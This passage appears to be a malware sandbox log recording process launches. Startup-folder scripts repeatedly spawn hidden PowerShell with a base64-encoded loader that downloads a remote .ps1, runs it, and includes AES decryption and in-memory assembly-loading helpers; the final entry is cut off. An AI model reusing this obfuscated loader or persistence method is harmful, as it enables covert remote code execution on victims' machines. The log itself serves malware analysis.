                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4b5a513a.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOw